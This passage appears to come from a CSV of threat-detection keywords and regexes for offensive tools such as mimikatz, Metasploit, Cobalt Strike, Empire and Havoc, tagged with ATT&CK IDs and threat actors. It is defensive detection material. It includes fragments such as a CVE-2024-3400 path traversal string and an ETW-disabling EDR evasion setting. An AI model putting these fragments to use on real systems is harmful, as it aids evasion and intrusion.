"*service::preshutdown*",".{0,1000}service\:\:preshutdown.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","58485"
"*service_permissions_escalate.rb*",".{0,1000}service_permissions_escalate\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58486"
"*ServiceBase.Run(new MakeMeAdminService(*",".{0,1000}ServiceBase\.Run\(new\sMakeMeAdminService\(.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","58487"
"*servicedigilogos@protonmail.com*",".{0,1000}servicedigilogos\@protonmail\.com.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","58488"
"*ServiceHavoc.exe",".{0,1000}ServiceHavoc\.exe","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","58489"
"*servicemove*hid.dll*",".{0,1000}servicemove.{0,1000}hid\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","New Lateral Movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/netero1010/ServiceMove-BOF","1","1","N/A","N/A","10","10","291","48","2022-02-23T07:17:38Z","2021-08-16T07:16:31Z","58490"
"*ServiceName = """"[C2ProfileService]*",".{0,1000}ServiceName\s\=\s\""\[C2ProfileService\].{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","0","#content","N/A","9","","N/A","","","","58491"
"*ServiceName = ""MakeMeAdmin""*",".{0,1000}ServiceName\s\=\s\""MakeMeAdmin\"".{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","N/A","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","58492"
"*serviceName = *""KrbSCM""",".{0,1000}serviceName\s\=\s.{0,1000}\""KrbSCM\""","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","N/A","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","58493"
"*ServiceName*BadWindowsService*",".{0,1000}ServiceName.{0,1000}BadWindowsService.{0,1000}","offensive_tool_keyword","BadWindowsService","An insecurely implemented and installed Windows service for emulating elevation of privileges vulnerabilities","T1068 - T1211 - T1050","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/eladshamir/BadWindowsService","1","0","#servicename","N/A","10","1","58","10","2022-08-25T14:22:25Z","2022-08-19T15:38:05Z","58496"
"*ServiceName*CorpVPN*",".{0,1000}ServiceName.{0,1000}CorpVPN.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","58497"
"*ServiceName'>KrbSCM*",".{0,1000}ServiceName\'\>KrbSCM.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","Dispossessor - Back Basta","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","servicename","10","10","1580","209","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z","58499"
"*services/p2p.Handle(): Wrote SMB fragment *",".{0,1000}services\/p2p\.Handle\(\)\:\sWrote\sSMB\sfragment\s.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","58503"
"*ServiceShell - PoC to create Service Logon process*",".{0,1000}ServiceShell\s\-\sPoC\sto\screate\sService\sLogon\sprocess.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58504"
"*ServiceShell - PoC to create Service Logon process*",".{0,1000}ServiceShell\s\-\sPoC\sto\screate\sService\sLogon\sprocess.{0,1000}","offensive_tool_keyword","PrivFu","SeTcbPrivilege exploitation","T1134 - T1134.001 - T1078 - T1059 - T1075","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","PrivFu\PowerOfTcb","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58505"
"*servpw.exe*",".{0,1000}servpw\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58507"
"*servpw64.exe*",".{0,1000}servpw64\.exe.{0,1000}","offensive_tool_keyword","fgdump","A utility for dumping passwords on Windows NT/2000/XP/2003 machines","T1003.001 - T1003.002 - T1077 - T1059 - T1035 - T1021.002 - T1562.001","TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58508"
"*SeSecurityPrivilegePoC.exe*",".{0,1000}SeSecurityPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58509"
"*SeShutdownPrivilegePoC.exe*",".{0,1000}SeShutdownPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58510"
"*SESSID=../../../../*",".{0,1000}SESSID\=\.\.\/\.\.\/\.\.\/\.\.\/.{0,1000}","offensive_tool_keyword","POC","CVE-2024-3400 exploitation attempt","T1210.001 - T1068 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation tool","https://x.com/HackingLZ/status/1780239802496864474","1","1","#linux","N/A","8","10","N/A","N/A","N/A","N/A","58511"
"*SessionGopher.ps1*",".{0,1000}SessionGopher\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","58512"
"*SeSystemEnvironmentPrivilegePoC.exe*",".{0,1000}SeSystemEnvironmentPrivilegePoC\.exe.{0,1000}","offensive_tool_keyword","PrivFu","PoCs for sensitive token privileges such SeDebugPrivilege","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","PrivilegedOperations","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","58513"
"*set * virus_scanner*",".{0,1000}set\s.{0,1000}\svirus_scanner.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58514"
"*set AutoRunScript multi_console_command -rc /root/*.rc*",".{0,1000}set\sAutoRunScript\smulti_console_command\s\-rc\s\/root\/.{0,1000}\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit Callback Automation:Use AutoRunScript to run commands on a reverse shell callback","T1059 - T1064 - T1029","TA0002 - TA0003 - TA0004","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Linux.md","1","0","N/A","N/A","N/A","10","1594","198","2025-04-16T21:16:51Z","2021-08-16T17:34:25Z","58516"
"*set CertPath data/*",".{0,1000}set\sCertPath\sdata\/.{0,1000}","offensive_tool_keyword","empire","empire command lines patterns","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58517"
"*set CollectionMethodAll*",".{0,1000}set\sCollectionMethodAll.{0,1000}","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","58518"
"*set COMPlus_ETWEnabled=0*",".{0,1000}set\sCOMPlus_ETWEnabled\=0.{0,1000}","offensive_tool_keyword","ETW","stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call","T1055.001 - T1059.001 - T1562.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58519"
"*set encoder x86/shikata_ga_nai*",".{0,1000}set\sencoder\sx86\/shikata_ga_nai.{0,1000}","offensive_tool_keyword","metasploit","exploits often used by ransomware groups","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven - Dispossessor","Framework","https://github.com/rapid7/metasploit-framework","1","0","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","58520"
"*set havoc *",".{0,1000}set\shavoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","58522"
"*set hosts_stage*",".{0,1000}set\shosts_stage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","58524"
"*set https_proxy=http://127.0.0.1:9999*",".{0,1000}set\shttps_proxy\=http\:\/\/127\.0\.0\.1\:9999.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/XiebroC2","1","0","N/A","N/A","10","10","1200","192","2025-02-28T09:44:43Z","2024-02-15T15:46:07Z","58525"
"*set https_proxy=http://127.0.0.1:9999*",".{0,1000}set\shttps_proxy\=http\:\/\/127\.0\.0\.1\:9999.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","0","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","58526"
"*set keylogger*",".{0,1000}set\skeylogger.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","N/A","10","10","1676","299","2023-12-13T17:14:22Z","2018-08-14T14:19:43Z","58527"
"*set LFILE /*",".{0,1000}set\sLFILE\s\/.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - Black Basta - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY BEAR","C2","https://github.com/offsecginger/koadic","1","0","N/A","N/A","10","10","290","83","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z","58528"
"*Set Listener dbx*",".{0,1000}Set\sListener\sdbx.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","58529"
